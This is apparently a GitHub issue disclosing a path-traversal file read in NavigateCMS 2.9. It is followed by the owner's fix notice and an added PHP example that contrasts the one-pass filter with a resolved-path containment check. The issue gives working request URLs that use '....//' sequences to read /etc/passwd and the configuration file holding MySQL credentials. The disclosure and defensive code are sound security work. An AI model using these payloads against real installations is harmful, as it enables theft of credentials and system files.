arbitrary file read vulnerability in NavigateCMS 2.9 #28

Closed
bkfish opened this issue Nov 25, 2021 · 1 comment

bkfish commented Nov 25, 2021

exp

After login, we can see our sid in cookies.
For example, my sid is 161099c65675803ecc8de95ae08d3e12.
Then you can get an arbitrary file by
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//....//....//etc/passwd
With
/navigate/navigate_download.php?sid=161099c65675803ecc8de95ae08d3e12&id=....//....//cfg/globals.php
you can get some sensitive information such as the MySQL user/password.

analysis

Location: navigate_download.php
and in navigate\lib\core\core.php
We can bypass this filter by rewriting.

suggest

you can use replace('../', "hacker") rather than replace('../', "")

bkfish changed the title from "arbitrary file read vulnerability" to "arbitrary file read vulnerability in NavigateCMS 2.9" on Nov 25, 2021

NavigateCMS (Owner) commented

Fixed by fabb471

Thank you very much bkfish!
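
The filter bypass reported above, shown next to a containment check, as an added example: this is not NavigateCMS code and not the change made in fabb471. The function names `strip_once` and `resolve_inside` and the temporary directory layout are hypothetical, and the sample files are constructed for the demonstration.

```php
<?php
// Added example, not NavigateCMS code; names and layout are hypothetical.

// One-pass filter of the kind the issue describes: every "../" is removed
// once and the result is never scanned again.
function strip_once(string $id): string
{
    return str_replace('../', '', $id);
}

// Containment check: resolve the final path and require it to stay inside
// the base directory, however the input was spelled.
function resolve_inside(string $baseDir, string $id): ?string
{
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $id);
    if ($base === false || $path === false) {
        return null; // base or target does not exist
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved location is outside the base directory
    }
    return is_file($path) ? $path : null;
}

// Constructed layout: files/report.txt may be served, secret.txt may not.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo_' . bin2hex(random_bytes(4));
mkdir($root . '/files', 0700, true);
file_put_contents($root . '/files/report.txt', "public\n");
file_put_contents($root . '/secret.txt', "private\n");

foreach (['report.txt', '../secret.txt', '....//secret.txt'] as $id) {
    $filtered = strip_once($id);
    $weak     = realpath($root . '/files/' . $filtered); // path the weak code would open
    $strict   = resolve_inside($root . '/files', $id);
    printf(
        "%-18s filtered=%-14s weak=%s strict=%s\n",
        $id,
        $filtered,
        $weak === false ? 'not found' : substr($weak, strlen(realpath($root))),
        $strict === null ? 'rejected' : substr($strict, strlen(realpath($root)))
    );
}

// Remove the constructed files.
unlink($root . '/files/report.txt');
unlink($root . '/secret.txt');
rmdir($root . '/files');
rmdir($root);
```

For the input `....//secret.txt` the one-pass filter leaves `../secret.txt`, which resolves outside `files`, while the containment check rejects it because the decision is made on the resolved path rather than on the input string.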
